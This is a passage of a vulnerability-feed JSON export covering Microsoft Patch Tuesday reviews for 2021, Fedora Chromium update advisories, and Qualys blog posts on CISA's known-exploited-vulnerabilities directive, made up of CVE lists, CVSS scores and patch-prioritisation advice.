weird RPC vulnerabilities. "Researcher who reported these bugs certainly found quite the attack surface". The most critical vulnerability is RCE in Exchange (CVE-2021-28480). This is not ProxyLogon, this is another vulnerability. ProxyLogon was in March. And this vulnerability is simply related to ProxyLogon, so it is believed that it is exploited in the wild as well. In the second place this Win32k Elevation of Privilege (CVE-2021-28310). It is clearly mentioned in several sources as being used in real attacks. "Bugs of this nature are typically combined with other bugs, such as a browser bug or PDF exploit, to take over a system". And the only vulnerability with a public exploit is the Azure DevOps Server Spoofing (CVE-2021-28459). Previously known as Team Foundation Server (\u200bTFS), Azure DevOps Server is a set of collaborative software development tools. It is hosted on-premises. Therefore, this vulnerability can be useful for attackers.\n\nLet's take a look at May. A very small Patch Tuesday. There are only 55 vulnerabilities. Vendors mainly wrote about HTTP Protocol Stack Remote Code Execution Vulnerability. But no catastrophe happened. "tenable: On May 16, security researcher 0vercl0k published PoC code to github for CVE-2021-31166. Based on our analysis, this exploit could only result in a denial of service (DoS) condition". VM vendors also wrote a lot about Hyper-V Remote Code Execution Vulnerability. But there was no real exploitation there either. But a real exploit appeared for Remote Code Execution in Microsoft SharePoint (CVE-2021-31181). And exploitation in the wild was mentioned for Windows Container Manager Service (CVE-2021-31167), which no VM vendor mentioned at all. But the exploitation was "Personally observed in an environment", so this may not be accurate. Also take a look at Memory Corruption in Microsoft Scripting Engine (CVE-2021-26419) with a public exploit and Information Disclosure in Windows Wireless Networking (CVE-2020-24587) with a sign of exploitation in the wild (but this also may not be accurate).\n\nAnd finally June. There are even fewer vulnerabilities, only 49. But there are a lot of them with a sign of exploitation in the wild. And this information is directly from Microsoft. Windows MSHTML Platform Remote Code Execution (CVE-2021-33742). Elevations of Privilege in Windows NTFS (CVE-2021-31956), Microsoft Enhanced Cryptographic Provider (CVE-2021-31199, CVE-2021-31201), Microsoft DWM Core Library (CVE-2021-33739). Windows Kernel Information Disclosure (CVE-2021-31955). Much more than usual. VM vendors have written the most about EoP in Windows NTFS (CVE-2021-31956). Do you know what vulnerability they didn't highlight at all? Elevations of Privilege and later Remote Code Execution in Windows Print Spooler (CVE-2021-1675). The one that started the PrintNightmare story. Very ironic. Also pay attention to Spoofing in Microsoft SharePoint (CVE-2021-31950) for which there is a public Server-Side Request Forgery exploit. VM vendors also did not write anything about this vulnerability in their reviews.\n\nFull Vulristics reports:\n\n * [ms_patch_tuesday_april2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_may2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_may2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_june2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_june2021_report_avleonov_comments.html>)\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-10T00:14:59", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24587", "CVE-2021-1675", "CVE-2021-26419", "CVE-2021-28310", "CVE-2021-28459", "CVE-2021-28480", "CVE-2021-31166", "CVE-2021-31167", "CVE-2021-31181", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31950", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-07-10T00:14:59", "id": "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "href": "http://feedproxy.google.com/~r/avleonov/~3/zKo35MmSBcA/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-07-28T18:41:40", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-05-12T05:35:46", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: chromium-90.0.4430.93-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2021-05-12T05:35:46", "id": "FEDORA:D63AA304E89C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EAJ42L4JFPBJATCZ7MOZQTUDGV4OEHHG/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:40", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-05-12T05:44:40", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: chromium-90.0.4430.93-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2021-05-12T05:44:40", "id": "FEDORA:B4C4A30D8539", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VUZBGKGVZADNA3I24NVG7HAYYUTOSN5A/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:40", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-05-14T21:12:29", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: chromium-90.0.4430.93-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2021-05-14T21:12:29", "id": "FEDORA:993DD30E4796", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/U3GZ42MYPGD35V652ZPVPYYS7A7LVXVY/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:22", "description": "### Microsoft Patch Tuesday \u2013 June 2021\n\nMicrosoft patched 50 CVEs in their June 2021 Patch Tuesday release, and five of them are rated as critical severity. Six have applicable exploits.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) \u2013 Microsoft Defender Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in its Defender product (CVE-2021-31985). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 7.8 by the vendor.\n\n[CVE-2021-31959](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31959>) \u2013 Scripting Engine Memory Corruption Vulnerability\n\nMicrosoft released patches addressing a critical memory corruption vulnerability in the Chakra JScript scripting engine. This vulnerability impacts Windows RT, Windows 7, Windows 8, Windows 10, Windows Server 2008 R2, Windows Server 2012 (R2) and Windows Server 2016. An adversary can exploit this vulnerability when the target user opens a specially crafted file.\n\n[CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>) \u2013 Microsoft SharePoint Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE in SharePoint Server. This CVE is assigned a CVSSv3 base score of 7.1 by the vendor.\n\n#### Six 0-Day Vulnerabilities with Exploits in the Wild Patched\n\nThe following vulnerabilities need immediate attention for patching since they have active exploits in the wild:\n\n[CVE-2021-33742](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33742>) \u2013 Windows MSHTML Platform Remote Code Execution Vulnerability \n[CVE-2021-33739](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33739>) \u2013 Microsoft DWM Core Library Elevation of Privilege Vulnerability \n[CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>) \u2013 Windows NTFS Elevation of Privilege Vulnerability \n[CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>) \u2013 Windows Kernel Information Disclosure Vulnerability \n[CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability \n[CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n\n#### **Qualys QIDs Providing Coverage**\n\nQID| Title| Severity| CVE ID \n---|---|---|--- \n91768| Microsoft .NET Core Security Update June 2021| Medium| CVE-2021-31957 \n91769| Microsoft Visual Studio Security Update for June 2021| Medium| CVE-2021-31957 \n375614| Visual Studio Code Kubernetes Tools Extension Elevation of Privilege Vulnerability| Medium| CVE-2021-31938 \n110383| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities June 2021| High| CVE-2021-31966,CVE-2021-31965,CVE-2021-31964,CVE-2021-31963,CVE-2021-31950,CVE-2021-31948,CVE-2021-26420 \n110384| Microsoft Office and Microsoft Office Services and Web Apps Security Update June 2021| High| CVE-2021-31939,CVE-2021-31941,CVE-2021-31940,CVE-2021-31949 \n110385| Mcrosoft Outlook Remote Code Execution Vulnerability Security Update June 2021| High| CVE-2021-31949,CVE-2021-31941 \n91771| Microsoft Defender Multiple Vulnerabilities - June 2021| Critical| CVE-2021-31978,CVE-2021-31985 \n91772| Microsoft Windows Security Update for June 2021| Critical| 